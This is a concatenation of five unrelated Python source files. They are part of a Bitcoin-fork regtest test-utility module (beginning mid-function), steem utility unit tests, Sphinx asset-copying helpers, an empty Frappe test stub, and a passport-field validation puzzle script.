except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if (code is not None) and (code != e.error["code"]):
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if (message is not None) and (message not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
return True
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
return False
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, str):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find=False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find:
assert_equal(expected, {})
num_matched = 0
for item in object_array:
all_match = True
for key, value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find:
num_matched = num_matched + 1
for key, value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s" % (str(item), str(key), str(value)))
num_matched = num_matched + 1
if num_matched == 0 and not should_not_find:
raise AssertionError("No objects matched %s" % (str(to_match)))
if num_matched > 0 and should_not_find:
raise AssertionError("Objects were found %s" % (str(to_match)))
# Utility functions
###################
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hash256(byte_str):
sha256 = hashlib.sha256()
sha256.update(byte_str)
sha256d = hashlib.sha256()
sha256d.update(sha256.digest())
return sha256d.digest()[::-1]
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf'), lock=None):
if attempts == float('inf') and timeout == float('inf'):
timeout = 60
attempt = 0
time_end = time.time() + timeout
while attempt < attempts and time.time() < time_end:
if lock:
with lock:
if predicate():
return
else:
if predicate():
return
attempt += 1
time.sleep(0.05)
# Print the cause of the timeout
predicate_source = "''''\n" + inspect.getsource(predicate) + "'''"
logger.error("wait_until() failed. Predicate: {}".format(predicate_source))
if attempt >= attempts:
raise AssertionError("Predicate {} not true after {} attempts".format(predicate_source, attempts))
elif time.time() >= time_end:
raise AssertionError("Predicate {} not true after {} seconds".format(predicate_source, timeout))
raise RuntimeError('Unreachable')
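# Hypothetical usage sketch (the predicate below is an assumption, not from the
# source): wait_until polls the callable every 50ms until it returns True or the
# timeout/attempt budget is exhausted, e.g.
#
#     wait_until(lambda: node.getblockcount() >= 100, timeout=30)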
# RPC/P2P connection constants and functions
############################################
# The maximum number of nodes a single test can spawn
MAX_NODES = 8
# Don't assign rpc or p2p ports lower than this
PORT_MIN = 11000
# The number of ports to "reserve" for p2p and rpc, each
PORT_RANGE = 5000
class PortSeed:
# Must be initialized with a unique integer for each process
n = None
def get_rpc_proxy(url, node_number, timeout=None, coveragedir=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
coveragedir, node_number) if coveragedir else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def p2p_port(n):
assert(n <= MAX_NODES)
return PORT_MIN + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_port(n):
return PORT_MIN + PORT_RANGE + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_url(datadir, i, rpchost=None):
rpc_u, rpc_p = get_auth_cookie(datadir)
host = '127.0.0.1'
port = rpc_port(i)
if rpchost:
parts = rpchost.split(':')
if len(parts) == 2:
host, port = parts
else:
host = rpchost
return "http://%s:%s@%s:%d" % (rpc_u, rpc_p, host, int(port))
# Node functions
################
def initialize_datadir(dirname, n):
datadir = get_datadir_path(dirname, n)
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "generalcoin.conf"), 'w', encoding='utf8') as f:
f.write("regtest=1\n")
f.write("[regtest]\n")
f.write("port=" + str(p2p_port(n)) + "\n")
f.write("rpcport=" + str(rpc_port(n)) + "\n")
f.write("server=1\n")
f.write("keypool=1\n")
f.write("discover=0\n")
f.write("listenonion=0\n")
f.write("printtoconsole=0\n")
os.makedirs(os.path.join(datadir, 'stderr'), exist_ok=True)
os.makedirs(os.path.join(datadir, 'stdout'), exist_ok=True)
return datadir
def get_datadir_path(dirname, n):
return os.path.join(dirname, "node" + str(n))
def append_config(datadir, options):
with open(os.path.join(datadir, "generalcoin.conf"), 'a', encoding='utf8') as f:
for option in options:
f.write(option + "\n")
def get_auth_cookie(datadir):
user = None
password = None
if os.path.isfile(os.path.join(datadir, "generalcoin.conf")):
with open(os.path.join(datadir, "generalcoin.conf"), 'r', encoding='utf8') as f:
for line in f:
if line.startswith("rpcuser="):
assert user is None # Ensure that there is only one rpcuser line
user = line.split("=")[1].strip("\n")
if line.startswith("rpcpassword="):
assert password is None # Ensure that there is only one rpcpassword line
password = line.split("=")[1].strip("\n")
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")) and os.access(os.path.join(datadir, "regtest", ".cookie"), os.R_OK):
with open(os.path.join(datadir, "regtest", ".cookie"), 'r', encoding="ascii") as f:
userpass = f.read()
split_userpass = userpass.split(':')
user = split_userpass[0]
password = split_userpass[1]
if user is None or password is None:
raise ValueError("No RPC credentials")
return user, password
# If a cookie file exists in the given datadir, delete it.
def delete_cookie_file(datadir):
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")):
logger.debug("Deleting leftover cookie file")
os.remove(os.path.join(datadir, "regtest", ".cookie"))
def get_bip9_status(node, key):
info = node.getblockchaininfo()
return info['bip9_softforks'][key]
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def disconnect_nodes(from_connection, node_num):
for peer_id in [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']]:
try:
from_connection.disconnectnode(nodeid=peer_id)
except JSONRPCException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(lambda: [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']] == [], timeout=5)
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:" + str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in from_connection.getpeerinfo()))
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def sync_blocks(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same tip.
    sync_blocks needs to be called with an rpc_connections set that has at least
one node already synced to the latest, stable tip, otherwise there's a
chance it might return before all nodes are stably synced.
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
best_hash = [x.getbestblockhash() for x in rpc_connections]
if best_hash.count(best_hash[0]) == len(rpc_connections):
return
time.sleep(wait)
raise AssertionError("Block sync timed out:{}".format("".join("\n {!r}".format(b) for b in best_hash)))
def sync_mempools(rpc_connections, *, wait=1, timeout=60, flush_scheduler=True):
"""
Wait until everybody has the same transactions in their memory
pools
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
pool = [set(r.getrawmempool()) for r in rpc_connections]
if pool.count(pool[0]) == len(rpc_connections):
if flush_scheduler:
for r in rpc_connections:
r.syncwithvalidationinterfacequeue()
return
time.sleep(wait)
raise AssertionError("Mempool sync timed out:{}".format("".join("\n {!r}".format(m) for m in pool)))
# Transaction/Block functions
#############################
def find_output(node, txid, amount, *, blockhash=None):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1, blockhash)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found" % (txid, str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >= 0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({"txid": t["txid"], "vout": t["vout"], "address": t["address"]})
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out + fee
change = amount_in - amount
if change > amount * 2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change / 2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment * random.randint(0, fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount + fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransactionwithwallet(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
to_generate = int(0.5 * count) + 101
while to_generate > 0:
node.generate(min(25, to_generate))
to_generate -= 25
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in range(iterations):
t = utxos.pop()
inputs = []
inputs.append({"txid": t["txid"], "vout": t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value / 2)
outputs[addr2] = satoshi_round(send_value / 2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransactionwithwallet(raw_tx)["hex"]
node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" # OP_RETURN OP_PUSH2 512 bytes
for i in range(512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in range(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, num, fee):
addr = node.getnewaddress()
txids = []
for _ in range(num):
t = utxos.pop()
inputs = [{"txid": t["txid"], "vout": t["vout"]}]
outputs = {}
change = t['amount'] - fee
outputs[addr] = satoshi_round(change)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransactionwithwallet(newtx, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def mine_large_block(node, utxos=None):
# generate a 66k transaction,
    # and 14 of them are close to the 1MB block limit
num = 14
txouts = gen_return_txouts()
utxos = utxos if utxos is not None else []
if len(utxos) < num:
utxos.clear()
utxos.extend(node.listunspent())
fee = 100 * node.getnetworkinfo()["relayfee"]
create_lots_of_big_transactions(node, txouts, utxos, num, fee=fee)
node.generate(1)
def find_vout_for_address(node, txid, addr):
"""
Locate the vout index of the given transaction sending to the
given address. Raises runtime error exception if not found.
"""
tx = node.getrawtransaction(txid, True)
for i in range(len(tx["vout"])):
if any([addr == a for a in tx["vout"][i]["scriptPubKey"]["addresses"]]):
return i
raise RuntimeError("Vout not found for address: txid=%s, addr=%s" % (txid, addr))
|
import unittest
from steem.utils import (
constructIdentifier,
sanitizePermlink,
derivePermlink,
resolveIdentifier,
yaml_parse_file,
formatTime,
)
class Testcases(unittest.TestCase):
def test_constructIdentifier(self):
self.assertEqual(constructIdentifier("A", "B"), "@A/B")
def test_sanitizePermlink(self):
self.assertEqual(sanitizePermlink("aAf_0.12"), "aaf-0-12")
self.assertEqual(sanitizePermlink("[](){}"), "")
def test_derivePermlink(self):
self.assertEqual(derivePermlink("Hello World"), "hello-world")
self.assertEqual(derivePermlink("aAf_0.12"), "aaf-0-12")
self.assertEqual(derivePermlink("[](){}"), "")
def test_resolveIdentifier(self):
self.assertEqual(resolveIdentifier("@A/B"), ("A", "B"))
def test_yaml_parse_file(self):
pass
def test_formatTime(self):
self.assertEqual(formatTime(1463480746), "20160517t102546")
if __name__ == '__main__':
unittest.main()
|
"""File utility functions for Sphinx."""
import os
import posixpath
from typing import TYPE_CHECKING, Callable, Dict
from docutils.utils import relative_path
from sphinx.util.osutil import copyfile, ensuredir
from sphinx.util.typing import PathMatcher
if TYPE_CHECKING:
from sphinx.util.template import BaseRenderer
def copy_asset_file(source: str, destination: str,
context: Dict = None, renderer: "BaseRenderer" = None) -> None:
"""Copy an asset file to destination.
On copying, it expands the template variables if context argument is given and
the asset is a template file.
:param source: The path to source file
:param destination: The path to destination file or directory
:param context: The template variables. If not given, template files are simply copied
:param renderer: The template engine. If not given, SphinxRenderer is used by default
"""
if not os.path.exists(source):
return
if os.path.isdir(destination):
        # Use source filename if destination points to a directory
destination = os.path.join(destination, os.path.basename(source))
if source.lower().endswith('_t') and context is not None:
if renderer is None:
from sphinx.util.template import SphinxRenderer
renderer = SphinxRenderer()
with open(source, encoding='utf-8') as fsrc:
if destination.lower().endswith('_t'):
destination = destination[:-2]
with open(destination, 'w', encoding='utf-8') as fdst:
fdst.write(renderer.render_string(fsrc.read(), context))
else:
copyfile(source, destination)
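# Hypothetical usage sketch (paths and context are assumptions, not from Sphinx):
# a '_t' suffix marks a template, so
#
#     copy_asset_file('static/layout.html_t', outdir, context={'project': 'demo'})
#
# renders the template into outdir/layout.html, while a plain file path with no
# context is copied verbatim.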
def copy_asset(source: str, destination: str, excluded: PathMatcher = lambda path: False,
context: Dict = None, renderer: "BaseRenderer" = None,
onerror: Callable[[str, Exception], None] = None) -> None:
"""Copy asset files to destination recursively.
On copying, it expands the template variables if context argument is given and
the asset is a template file.
:param source: The path to source file or directory
:param destination: The path to destination directory
:param excluded: The matcher to determine the given path should be copied or not
:param context: The template variables. If not given, template files are simply copied
:param renderer: The template engine. If not given, SphinxRenderer is used by default
:param onerror: The error handler.
"""
if not os.path.exists(source):
return
if renderer is None:
from sphinx.util.template import SphinxRenderer
renderer = SphinxRenderer()
ensuredir(destination)
if os.path.isfile(source):
copy_asset_file(source, destination, context, renderer)
return
for root, dirs, files in os.walk(source, followlinks=True):
reldir = relative_path(source, root)
for dir in dirs[:]:
if excluded(posixpath.join(reldir, dir)):
dirs.remove(dir)
else:
ensuredir(posixpath.join(destination, reldir, dir))
for filename in files:
if not excluded(posixpath.join(reldir, filename)):
try:
copy_asset_file(posixpath.join(root, filename),
posixpath.join(destination, reldir),
context, renderer)
except Exception as exc:
if onerror:
onerror(posixpath.join(root, filename), exc)
else:
raise
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Marc Anthony Reyes and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestGame(unittest.TestCase):
pass
|
#!/bin/env python3
def puzzle2():
entries = set()
allowed1 = {"byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"}
valid = 0
# Read in all the rules
with open('input.txt', 'r') as input:
l = 0
for line in input:
l += 1
if line == "\n":
# print(entries)
if len(allowed1 & entries) == 7:
valid += 1
entries = set()
else:
keyval = line.split(' ')
for i in keyval:
(key, val) = i.split(':')
if val[-1:] == '\n':
val = val[:-1]
if key == "byr":
val = int(val)
if val >= 1920 and val <= 2002:
entries.add(key)
else:
print('{} byr'.format(l))
if key == "iyr":
val = int(val)
if val >= 2010 and val <= 2020:
entries.add(key)
else:
print('{} iyr'.format(l))
if key == "eyr":
val = int(val)
if val >= 2020 and val <= 2030:
entries.add(key)
else:
print('{} eyr'.format(l))
if key == "hgt":
if val[-2:] == "cm":
val = int(val[:-2])
if val >= 150 and val <= 193:
entries.add(key)
else:
print('{} hgt'.format(l))
elif val[-2:] == "in":
val = int(val[:-2])
if val >= 59 and val <= 76:
entries.add(key)
else:
print('{} hgt'.format(l))
if key == "hcl":
if val[0] == '#':
val = val[1:]
check = 0
for c in val:
if c in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'b', 'c', 'd', 'e', 'f']:
check += 1
if check == 6:
entries.add(key)
else:
print('{} hcl'.format(l))
if key == "ecl":
if val in ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']:
entries.add(key)
else:
print('{} ecl'.format(l))
if key == "pid":
check = 0
for c in val:
if c in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']:
check += 1
if check == 9:
entries.add(key)
else:
print('{} pid'.format(l))
if len(allowed1 & entries) == 7:
valid += 1
print(valid)
if __name__ == "__main__":
puzzle2()
|